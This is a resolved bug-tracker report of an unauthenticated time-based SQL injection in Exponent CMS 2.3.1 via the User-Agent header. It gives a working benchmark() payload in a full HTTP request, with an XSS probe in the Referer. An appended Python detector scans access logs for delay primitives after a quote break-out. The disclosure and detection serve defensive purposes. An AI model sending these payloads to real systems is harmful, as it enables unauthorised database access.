#1238 ✓resolved
Narendra Bhati

Time Based SQL Injection "User Agent"

Reported by Narendra Bhati | November 16th, 2014 @ 11:53 AM | in User issues

Exponent CMS 2.3.1 - Time Based SQL Injection

Exploitation - Remotely (Non-Authenticated User Can Exploit It)

Vulnerable Parameter - User Agent Header

Payload - ' and benchmark(20000000,sha1(1))--

Here is the HTTP request, which takes 2 seconds to respond compared to the original response

GET /exponent/users/edituser/id/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0'%20and%20benchmark(20000000%2csha1(1))--%20
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/exponent/index.php?src=%22%3E%3Cscript%3Ealert(1)%...
Cookie: pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C75fabcf00a72c6c06c40ec432c44c158a90fe85b; xoadmstyle=orange; PHPSESSID=1snnfufn6jlq63rbf1l7q9ps76; xoops_user54677c84=0
Connection: keep-alive
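As an added example (not part of the report or of Exponent CMS), here is defender-side detection logic that scans constructed Apache combined-format access log lines, one of which carries the User-Agent from the request above, and flags a quote break-out followed by a time-delay SQL primitive after percent-decoding; the log format, sample lines and function names are assumptions.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format (assumed): the User-Agent is the last quoted field.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Time-delay primitives used in time-based blind SQL injection (MySQL, PostgreSQL, MSSQL).
DELAY_RE = re.compile(
    r"\b(benchmark|sleep|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE
)
# A quote followed by a boolean operator is the break-out seen in the report's payload.
BREAKOUT_RE = re.compile(r"['\"]\s*(and|or)\s", re.IGNORECASE)

# Constructed sample log: a benign request and one carrying the reported User-Agent.
SAMPLE_LOG = [
    '127.0.0.1 - - [16/Nov/2014:11:53:00 +0000] "GET /exponent/users/edituser/id/1 HTTP/1.1" '
    '200 4821 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0"',
    '127.0.0.1 - - [16/Nov/2014:11:53:02 +0000] "GET /exponent/users/edituser/id/1 HTTP/1.1" '
    '200 4821 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 '
    "Firefox/32.0'%20and%20benchmark(20000000%2csha1(1))--%20\"",
]


def decode_ua(raw):
    """Percent-decode repeatedly (bounded) so nested encoding cannot hide keywords,
    then collapse whitespace so the patterns above match reliably."""
    text = raw
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text)


def flag_time_based_sqli(log_lines):
    """Return (client_ip, decoded_user_agent, matched_primitive) for suspicious lines."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        ua = decode_ua(m.group("ua"))
        delay = DELAY_RE.search(ua)
        if delay and BREAKOUT_RE.search(ua):
            hits.append((m.group("ip"), ua, delay.group(0).strip().lower()))
    return hits


if __name__ == "__main__":
    for ip, ua, primitive in flag_time_based_sqli(SAMPLE_LOG):
        print(f"{ip}: {primitive} in User-Agent -> {ua}")
```

Pair this with response-time outliers on the same path (the report's 2-second delay) to reduce false positives from user agents that merely contain the keyword.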

Bug Tracker for Exponent CMS